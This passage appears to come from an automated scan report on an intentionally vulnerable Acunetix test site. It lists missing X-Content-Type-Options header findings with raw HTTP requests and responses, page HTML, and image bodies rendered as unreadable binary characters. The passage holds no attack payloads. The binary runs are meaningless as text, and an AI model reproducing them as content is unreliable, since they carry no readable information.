href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	GET
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 324 bytes.	GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 14064
Response Body - size: 14,064 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/favicon.ico
Method	GET
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 367 bytes.	GET http://testaspnet.vulnweb.com/favicon.ico HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc
Request Body - size: 0 bytes.
Response Header - size: 249 bytes.	HTTP/1.1 200 OK Content-Type: image/x-icon Last-Modified: Thu, 29 May 2008 14:36:35 GMT Accept-Ranges: bytes ETag: "184366599c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:25 GMT Content-Length: 894
Response Body - size: 894 bytes.	h( HHÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿïîý\Uêà&ãÝÛûóóýñ¥ ôõôþäãü@6æàmeìøøþÍÊùààáÖÔú³¯õßàª¦ôÔÒù'ãàãÈÅùÐÍùâáá×Õú²®õ àá©ôÕÓú'äá&äÅÂùäãü3)åáàðêèüðòìëýðààE<éòñþüüÿò à áác[ëÖÔúØÕú_Wë à á à°¬õÿÿÿÿÿÿðïý90æ à ááááá áà>4çõõþÿÿÿÿÿÿÿÿÿÑÎù:2æààááàà:0æÎÌùÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÝÜûðZRê&ã)äVNêòÚØúÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿþþÿñðýäãüâáûðïýþþÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ
URL	http://testaspnet.vulnweb.com/images/background.gif
Method	GET
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 387 bytes.	GET http://testaspnet.vulnweb.com/images/background.gif HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/styles.css Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc
Request Body - size: 0 bytes.
Response Header - size: 247 bytes.	HTTP/1.1 200 OK Content-Type: image/gif Last-Modified: Thu, 29 May 2008 14:36:54 GMT Accept-Ranges: bytes ETag: "9a66e17099c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:25 GMT Content-Length: 144
Response Body - size: 144 bytes.	GIF89a³ÿÿÿ×Ê¹uSxVÍÀº©æÜÏÀ°¢p§v!ù,=0¸8ëÍ»ÿ`(dihª®lë¾p,Ïtmßx®ï¼' BÀ8$½¤rÉl:Ð¨tJZ¯²Aâ0;
URL	http://testaspnet.vulnweb.com/images/comment-after.gif
Method	GET
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 355 bytes.	GET http://testaspnet.vulnweb.com/images/comment-after.gif HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 247 bytes.	HTTP/1.1 200 OK Content-Type: image/gif Last-Modified: Thu, 29 May 2008 14:36:55 GMT Accept-Ranges: bytes ETag: "2c6507199c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 1957
Response Body - size: 1,957 bytes.	GIF89aôÕÿÿÿ`@õðìðéâøôñíåÝüûùú÷õüúùîåÝúøõ÷ôñðèâóìçòìçòíçõñìóíçøôðíåÞúøöüúúüûúú÷ö÷ôðïéâîåÞöðìù÷õöñìõðëùøõïèâøõñù÷öðéãíäÝ÷õñõñëûûùëâÙøõðùøöîäÝðèãîäÞéÞÕæÚÏíäÞéßÔûúùçÜÒ÷õðöðëçÛÑïéãëáÙëâØçÜÑ!ù,ôÿÀ@Å0 C¢eXDNÅ0}§I¤ôIµ É¨IT>§Çf¶ÕU¢¸\ñ~+Í£Ö¿Öc't^PZYPCKMherF^Nv[Zbxr_\H2fci`¤MY\yUnGhO'VTl{kL[·Wz¬¤T¸dicL¡«¹eT'¹¨}}cLeyR»ÝiÚHâ¼Õr{CªTuËD " ð§@ }þâã°¯à@!PHA½ ª(ÈñGâë80#È@âË1ä~ø~tÒa@cÜ³ ÿ?\|\9r"Ã8#ò<HSâ½0Ê<ÀS2âÏ:ïuÉ¦{â«3#ÐoêÄ¹vßØýIMê!ÚpGÆäHpèI½&(§B·/Ø/oÛ»-ê¬ùç³zµNTêsÑU¤T+kÀ>ÿ%u©àêè«%vÝºé\ è-!(Ç@óæ/Àb¸óä'WN`Áqï$xçÎÝz÷æÒ½/¿~½óñ!ÔcÞ]ùðöâíw¿<}õá·@\|ï]tÓé·wÙÞÖ%Gà~¤À_vöWyåÙÇÿxnÈ¡Ú½ &ÞWñ©HsNG ¢`v8]ÇagÈm(ÞxÛgÞ.vGcw ÞÞN6Bsæ59¢u¨ÓmÇvOòG$!>6Jø¤Vè ÎAWßc¾ér¤g}ê¹GÊ@j(n`è¢"Z¨£2zh¤lÐ(¥ à(¢P V ª¢ àÁ£¤ Ð©¦> )£Bðª¬®bJ«£Æz(¨"zjªFJë¤²v°ºé¢\ª)±Úè«z`)«ª:;ë©Ø P®· [êµÖpê±v:ÿì²âB@n¯Ý.ún¥Ýþo¦ÃÊêÁ´ÏÚï¡ÎvÊ-·¤",µ¬Z+ªB+î¿v ì©p°ýrªª >à@²Ç DÁ 4ðqÈ&G2Ê0; sÐ\|2Í!¯ü±¸òÉ${\sÉ&2È¯\rÍ(\|³Ì<Ë¬²Ð2,´É(\4ÏGGÝsÖE'òÔ]m2Ï-{ýsÓI{ítÌ?kÍsÏ./}4ÍLÓ}rÕã,wÖc¿uÊs×\õÇ k=¶Ç=/M3ÑFs]³ÏN'ÎôÌ=K=òØJ¿,5Ì)û\|òÈ>®óÛ3#½sæ.ÍxèCK]¸ì6¿>ÿ2â·5Ø"çùÍD³8Ö\ßMrñ6ã4Ú8yÎ-OsãxCÝúÒ9gï5Ç0\|?Þ~øãÏ@æþ÷°/>øò£úð¯o~ùÞ£ÿÿüß÷È÷>óáO\|üc0ÈoLÿ8?F0\| ìðyðõÛß÷H?V°ôà ý§Bï±/üúX ? ^0tßûØBê/¬¡pÞì ;?!Öð´!ÿFpD"±$_ yÈÁþmò{áÈ?& P}¡o¨Dï <8Ãæÿõã HÀü8 ü1-(@ ?þ\|d9I@úqt¤#% HN.R$#)Iò$(¹IEle IÉJþÀ þ¨IEÒÒ¶4dvIËT:2\eILRLd)Jj>ó&%IyÌJ2©ü¥/ÅùÈVÆ2üc3yËcÀÎ´%*·ÍQ¤´¥3yyMEjSéÌä2½¹OWjð<e:}II~ §.]ùÍ[º²¦¬e.CIH`N²Ë4¤HÑYÈ.¤³lh IªÊ\6ÂòL=öHSÒã¦8Í©NwÊÓúô§@ ªPJÔ¢õ¨HMªRÊÔ¦:õ©PêRQ (xjM·ÊÕ®zõ«` «XÇJÖ²õ¬hM«Z×ÊÖ¶ºõp«\çJ×®ÀxAfZ×¾úõ¯ ¬`KØÂö°kf0Ø@¬d'KÙÊZö²ÍìVððU³ hGKÚÒÖ¯ìiWËÚÖºöµ°ìgcKÛÚÚö¶¸ujû;
URL	http://testaspnet.vulnweb.com/images/comment-before.gif
Method	GET
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 356 bytes.	GET http://testaspnet.vulnweb.com/images/comment-before.gif HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 248 bytes.	HTTP/1.1 200 OK Content-Type: image/gif Last-Modified: Thu, 29 May 2008 14:36:54 GMT Accept-Ranges: bytes ETag: "6a79f47099c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 1919
Response Body - size: 1,919 bytes.	GIF89aôÕÿÿÿ`@õðìðéâøôñíåÝüûùú÷õüúùîåÝúøõ÷ôñðèâòìçóìçòíçõñìóíçøôðíåÞúøöüúúüûúú÷ö÷ôðïéâîåÞöðìöñìù÷õõðëùøõïèâøõñù÷öðéãíäÝõñë÷õñûûùîäÝðèãùøöøõðîäÞûúù÷õðöðëíäÞïéã!ù,ôÿ@pH,È¤rÉl:Ð¨tJZ¯Ø¬vËíz¿à°xL.Ïè´zÍn»ßð¸\|N¯Ûïø¼~ÏïûÿB ¡¢£¤¥¦§¨©ª«¬§H ±² , ±²³¾Â ¾Æ³±ÆÇÁÁÅ³Ï¾µ¶¿ºÅ0µºµÆÓ¿Î½¸Ë¾à´½ÇÈ²ÓÆ(²Í½çñé¹îçÜÁì´Þ ¹$ËtõÆ²jÊ#VïØ5}È´ã&/^EaàÈ& =uúHä nCÖf¼.à;½¶äÈÌ_Dán©c<ÿÅ¤Í6²]8êÂÈµ[óô«êF\2}M5ÖÕnìýR0` v´j×²uA¸#ÖªÍp·íÚ¾s3ÌÝk7.Ü´s+>¼Wí[½q·=Ì ÅúZfL7ñe¿9³Å¸4lS+lX-æ¿A#ZvâÚiïÒxn¾¥EsfW¯dÜÓ<ô©O:6êÁÍKüðé¹§~ÝøñÓÍî«ÛsöÃ××ì:¹ðêiAg,÷xsß¶`À 8ðÀ "è@<à .aJ¨aFÐÿz¸` 6ðFè >áHa~(¡!rh"²Èá,B(a/ã'ùâöx$x!)Þ8#8n"&a1zh£þ \ÙdBNØå?&¨ M"xbº£¢ã6vx" 6Ic<j8!6¢$fÙ¡%¡v.Ú"or b¦ ÊIá¥CÉà¨è¢s id¾ ¢J)"{xa$Þ)¦Ö8â°H@$«,Én ì³Ì2¬´ÏB»lµl-¶× -³`A ÝfK®³Ó àÿÁ´è ®·ãNK-´ÎB0¯½òr¯´ÚÖ»,¹Í2»n»ÜVïµörð.¾þªkí³lë-Âßí¼Éz -¼îJ\|ïºð¿ûîÆÉ¾°îÂÓ{ðÃ&CrÀ!?;s¶!\s·ÛëÁÅ§ô²2Èè2Û0Æ¼/»ßRlòÐØKðºPtÁAën, 6!`¤°Í6h/Á b·6b£6Ý·ô½÷ÞuóÍvÜ}/¸â·-xc7ßiÍxàó¸ÞO8à/¹ã&À ·Ü«Ý7ÞÿzÝh®9+lÿwåS>8á/øíºï\|ÞÞyñ.äÉ½öîríBî÷õd¿ÍºÙwW~ûÙº.¸Þe®{ó\|OÏ7ê#nzûlÀváì_÷¥§=ºÜz/·ûßùç:¸I z±s_îG»Öå®mo£øèÀ¶¥M+¸ å×¸Á.m @ (@ À.ð@ p!N¨Â°'á]¨CÀgxª H\!p0/,"cx&°<lâRHB.QTÔa]ÈÃ.¾ðe!.PÄ,ñOü!HÆ¢ÿq`ôágÈÅzñ8¤ nØÃâQUäáÏhÆ&²à¢F¸D60d,"«Ã1<á#sXDú±jÄ!%ÈÉ'v0\|ãMéJÖñN$£ 5ÙÊÀ),e&GÅñÆ<2'iJCþÐ:DfÏCTÑDd×¨ÆÖQ ä3×xM&òÍÌã')@HTÀ0< ðNxZàñD@<å©OXÀÿÜg<ÿYOzúsµ*PÏ~êð´ç>ÿ9Ï\|öhC-Px:4¢PèB+ÏyT$hHúP¤ å§AÊÏwÞ3¨Gå©PêÓ"ÝéA êPz´¥å)BéÙ>ô§)C¡Ï"´¤ÕhPç Töt'¸©@Tô¢ø<èXjR¬B dhEúÐî/@S¯ZÖ '(+USÒ-©?ÏØV§ôÌªcÑØ¥zÔ§'}§UÒ»Â3A;
URL	http://testaspnet.vulnweb.com/images/logo_acunetix.gif
Method	GET
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 336 bytes.	GET http://testaspnet.vulnweb.com/images/logo_acunetix.gif HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 248 bytes.	HTTP/1.1 200 OK Content-Type: image/gif Last-Modified: Thu, 29 May 2008 14:36:55 GMT Accept-Ranges: bytes ETag: "7228247199c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 2506
